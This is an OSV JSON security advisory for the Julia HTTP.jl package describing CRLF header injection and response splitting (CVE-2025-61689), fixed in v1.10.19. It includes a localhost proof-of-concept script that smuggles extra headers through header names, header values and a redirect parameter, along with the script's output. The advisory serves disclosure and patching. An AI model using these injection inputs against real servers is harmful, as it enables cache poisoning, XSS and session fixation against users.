{"id":"JLSEC-2025-40","summary":"Header injection/Response splitting via header construction.","details":"HTTP.jl did not validate header names/values for illegal characters, allowing CRLF-based header injection and response splitting.\n\n```\nusing HTTP, Sockets\n\nfunction handle_index(req::HTTP.Request)\n    @show HTTP.header(req, \"X-Foo\")\n    return HTTP.Response(200, \"ok\")\nend\n\nfunction handle_redirect(req::HTTP.Request)\n    return HTTP.Response(301, [\"Location\" =\u003e get(HTTP.URIs.queryparams(req), \"to\", \"/\")], \"redirect\")\nend\n\nconst router = HTTP.Router()\nHTTP.register!(router, \"GET\", \"/\", handle_index)\nHTTP.register!(router, \"GET\", \"/redirect\", handle_redirect)\n\nserver = HTTP.serve!(router, Sockets.IPv4(0,0,0,0), 8080)\n\n\nprintln(\"[*] POC 1: Header injection in request through header key\")\nuser_input = \"X-Custom: x\\r\\nX-Foo: Bar\\r\\nX-Custom\"\nHTTP.get(\"http://localhost:8080/\", [user_input =\u003e \"hello\"])\n\nprintln()\n\nprintln(\"[*] POC 2: Header injection in request through header value\")\nuser_input = \"hello\\r\\nX-Foo: Bar\"\nHTTP.get(\"http://localhost:8080/\", [\"X-Custom\" =\u003e user_input])\n\nprintln()\n\nprintln(\"[*] POC 3: Header injection in response through header value\")\nres = HTTP.get(\"http://localhost:8080/redirect?to=/%0d%0aX-Foo:%20Bar\", redirect=false)\n@show HTTP.header(res, \"X-Foo\")\n\n```\n\n_Result_\n\n```\n[ Info: Listening on: 0.0.0.0:8080, thread id: 1\n[*] POC 1: Header injection in request through header key\nHTTP.header(req, \"X-Foo\") = \"Bar\"\n\n[*] POC 2: Header injection in request through header value\nHTTP.header(req, \"X-Foo\") = \"Bar\"\n\n[*] POC 3: Header injection in response through header value\nHTTP.header(res, \"X-Foo\") = \"Bar\"\n```\n\n### Impact\n\nThis enables HTTP response splitting and header injection, leading to cache poisoning, XSS, session fixation, and more.\n\n### Patches\n\nThis issue is fixed in HTTP.jl\n`v1.10.19`\n\n### Credit\n\nChen T","aliases":["CVE-2025-61689","GHSA-h3x8-ppwj-6vcj"],"modified":"2025-11-06T22:57:16.515669Z","published":"2025-10-14T04:37:19.606Z","database_specific":{"license":"CC-BY-4.0","sources":[{"published":"2025-10-10T12:51:29Z","url":"https://api.github.com/repos/JuliaWeb/HTTP.jl/security-advisories/GHSA-h3x8-ppwj-6vcj","imported":"2025-10-14T02:22:26.408Z","modified":"2025-10-10T12:51:29Z","html_url":"https://github.com/JuliaWeb/HTTP.jl/security/advisories/GHSA-h3x8-ppwj-6vcj","id":"GHSA-h3x8-ppwj-6vcj"}]},"affected":[{"package":{"name":"HTTP","ecosystem":"Julia","purl":"pkg:julia/HTTP?uuid=cd3eb016-35fb-5094-929b-558a96fad6f3"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.10.19"}]}],"database_specific":{"source":"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2025/JLSEC-2025-40.json"}}],"schema_version":"1.7.3"}